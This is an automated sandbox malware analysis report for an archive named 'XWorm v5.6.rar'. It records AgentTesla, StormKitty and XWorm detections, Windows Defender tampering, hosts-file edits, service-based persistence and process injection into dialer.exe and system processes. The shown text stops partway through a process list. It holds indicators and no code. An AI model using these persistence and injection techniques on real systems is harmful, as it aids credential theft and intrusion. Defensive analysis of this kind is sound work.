Malware Analysis Report

2024-09-23 02:54

Sample ID 240715-mexmla1gnj
Target XWorm v5.6.rar
SHA256 ed24079ff53c18d2ba5f45e9b314ff04d60511afe9c61d73d355842781c8402d
Tags
agenttesla stormkitty xworm evasion execution keylogger persistence pyinstaller spyware stealer trojan upx privilege_escalation
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ed24079ff53c18d2ba5f45e9b314ff04d60511afe9c61d73d355842781c8402d

Threat Level: Known bad

The file XWorm v5.6.rar was found to be: Known bad.

Malicious Activity Summary


Stormkitty family

Agenttesla family

Xworm family

Detect Xworm Payload

Contains code to disable Windows Defender

StormKitty payload

Modifies security service

AgentTesla

AgentTesla payload

AgentTesla payload

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Sets service image path in registry

Creates new service(s)

Stops running service(s)

UPX packed file

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Checks computer location settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

Detects Pyinstaller

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Detects videocard installed

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Checks processor information in registry

Runs ping.exe

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-07-15 10:23

Signatures

AgentTesla payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Agenttesla family

agenttesla

Contains code to disable Windows Defender

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

StormKitty payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Stormkitty family

stormkitty

Xworm family

xworm

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-15 10:23

Reported

2024-07-15 10:27

Platform

win7-20240708-en

Max time kernel

150s

Max time network

151s

Command Line

winlogon.exe

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Modifies security service

evasion
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP | C:\Windows\System32\svchost.exe | N/A
Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection | C:\Windows\System32\svchost.exe | N/A

AgentTesla payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A

Creates new service(s)

persistence execution

Drops file in Drivers directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\Xworm_Bypass.exe | N/A

Sets service image path in registry

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MCDRJPTJ\ImagePath = "C:\\ProgramData\\Xworm_Bypass.exe" | C:\Windows\system32\services.exe | N/A

Stops running service(s)

evasion execution

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\perfc011.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File created | C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File created | C:\Windows\system32\perfh00A.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Setup.evtx | C:\Windows\System32\svchost.exe | N/A
File created | C:\Windows\system32\perfh007.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File created | C:\Windows\system32\perfh009.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File created | C:\Windows\system32\perfc010.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File created | C:\Windows\system32\PerfStringBackup.TMP | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Xworm_Bypass.exe | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx | C:\Windows\System32\svchost.exe | N/A
File created | C:\Windows\system32\perfc00A.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File created | C:\Windows\system32\perfc00C.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File created | C:\Windows\system32\perfh00C.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
File created | C:\Windows\system32\perfh010.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File created | C:\Windows\system32\perfh011.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File opened for modification | C:\Windows\system32\PerfStringBackup.INI | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File created | C:\Windows\system32\perfc007.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File created | C:\Windows\system32\perfc009.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2960 set thread context of 276 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | C:\Windows\system32\dialer.exe
PID 2976 set thread context of 464 | N/A | C:\ProgramData\Xworm_Bypass.exe | C:\Windows\system32\dialer.exe
PID 2976 set thread context of 1680 | N/A | C:\ProgramData\Xworm_Bypass.exe | C:\Windows\system32\dialer.exe
PID 2976 set thread context of 1376 | N/A | C:\ProgramData\Xworm_Bypass.exe | C:\Windows\system32\dialer.exe

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\appcompat\programs\RecentFileCache.bcf | C:\Windows\system32\svchost.exe | N/A
File created | C:\Windows\inf\WmiApRpl\WmiApRpl.h | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File opened for modification | C:\Windows\inf\WmiApRpl\WmiApRpl.h | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File created | C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini | C:\Windows\system32\wbem\WMIADAP.EXE | N/A
File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A
File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A

Detects Pyinstaller

pyinstaller
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Enumerates physical storage devices

Checks processor information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80353449a1d6da01 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
N/A | N/A | C:\ProgramData\Xworm_Bypass.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\ProgramData\Xworm_Bypass.exe | N/A
N/A | N/A | C:\ProgramData\Xworm_Bypass.exe | N/A
N/A | N/A | C:\ProgramData\Xworm_Bypass.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\ProgramData\Xworm_Bypass.exe | N/A
N/A | N/A | C:\ProgramData\Xworm_Bypass.exe | N/A
N/A | N/A | C:\ProgramData\Xworm_Bypass.exe | N/A
N/A | N/A | C:\ProgramData\Xworm_Bypass.exe | N/A
N/A | N/A | C:\ProgramData\Xworm_Bypass.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\ProgramData\Xworm_Bypass.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A
N/A | N/A | C:\Windows\system32\dialer.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\dialer.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\ProgramData\Xworm_Bypass.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\dialer.exe | N/A
Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\dialer.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2160 wrote to memory of 2952 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe
PID 2160 wrote to memory of 2952 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe
PID 2160 wrote to memory of 2952 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe
PID 2160 wrote to memory of 2960 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe
PID 2160 wrote to memory of 2960 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe
PID 2160 wrote to memory of 2960 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe
PID 2160 wrote to memory of 1068 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 2160 wrote to memory of 1068 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 2160 wrote to memory of 1068 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 1068 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 1068 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 1068 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 1780 wrote to memory of 1956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wusa.exe
PID 1780 wrote to memory of 1956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wusa.exe
PID 1780 wrote to memory of 1956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wusa.exe
PID 2960 wrote to memory of 276 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | C:\Windows\system32\dialer.exe
PID 2960 wrote to memory of 276 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | C:\Windows\system32\dialer.exe
PID 2960 wrote to memory of 276 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | C:\Windows\system32\dialer.exe
PID 2960 wrote to memory of 276 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | C:\Windows\system32\dialer.exe
PID 2960 wrote to memory of 276 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | C:\Windows\system32\dialer.exe
PID 2960 wrote to memory of 276 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | C:\Windows\system32\dialer.exe
PID 2960 wrote to memory of 276 | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe | C:\Windows\system32\dialer.exe
PID 276 wrote to memory of 428 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\winlogon.exe
PID 276 wrote to memory of 472 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\services.exe
PID 276 wrote to memory of 488 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\lsass.exe
PID 276 wrote to memory of 496 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\lsm.exe
PID 276 wrote to memory of 596 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\svchost.exe
PID 276 wrote to memory of 672 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\svchost.exe
PID 276 wrote to memory of 740 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\System32\svchost.exe
PID 276 wrote to memory of 812 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\System32\svchost.exe
PID 276 wrote to memory of 848 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\svchost.exe
PID 276 wrote to memory of 964 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\svchost.exe
PID 276 wrote to memory of 236 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\svchost.exe
PID 276 wrote to memory of 344 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\System32\spoolsv.exe
PID 276 wrote to memory of 1032 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\svchost.exe
PID 276 wrote to memory of 1116 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\taskhost.exe
PID 276 wrote to memory of 1188 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\Dwm.exe
PID 276 wrote to memory of 1248 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\Explorer.EXE
PID 276 wrote to memory of 624 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\DllHost.exe
PID 276 wrote to memory of 2352 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\svchost.exe
PID 276 wrote to memory of 1076 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\sppsvc.exe
PID 276 wrote to memory of 2952 | N/A | C:\Windows\system32\dialer.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe
PID 276 wrote to memory of 2960 | N/A | C:\Windows\system32\dialer.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe
PID 276 wrote to memory of 1068 | N/A | C:\Windows\system32\dialer.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 276 wrote to memory of 2548 | N/A | C:\Windows\system32\dialer.exe | C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 276 wrote to memory of 1320 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\wbem\WMIADAP.EXE
PID 276 wrote to memory of 2228 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\wbem\wmiprvse.exe
PID 276 wrote to memory of 316 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\sc.exe
PID 276 wrote to memory of 2240 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\conhost.exe
PID 472 wrote to memory of 2976 | N/A | C:\Windows\system32\services.exe | C:\ProgramData\Xworm_Bypass.exe
PID 472 wrote to memory of 2976 | N/A | C:\Windows\system32\services.exe | C:\ProgramData\Xworm_Bypass.exe
PID 472 wrote to memory of 2976 | N/A | C:\Windows\system32\services.exe | C:\ProgramData\Xworm_Bypass.exe
PID 276 wrote to memory of 2976 | N/A | C:\Windows\system32\dialer.exe | C:\ProgramData\Xworm_Bypass.exe
PID 276 wrote to memory of 2040 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\sc.exe
PID 276 wrote to memory of 1196 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\conhost.exe
PID 276 wrote to memory of 2976 | N/A | C:\Windows\system32\dialer.exe | C:\ProgramData\Xworm_Bypass.exe
PID 276 wrote to memory of 1988 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 276 wrote to memory of 1080 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\conhost.exe
PID 2672 wrote to memory of 1564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wusa.exe
PID 2672 wrote to memory of 1564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wusa.exe
PID 2672 wrote to memory of 1564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wusa.exe
PID 276 wrote to memory of 2672 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\cmd.exe
PID 276 wrote to memory of 896 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\conhost.exe
PID 276 wrote to memory of 1132 | N/A | C:\Windows\system32\dialer.exe | C:\Windows\system32\sc.exe

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

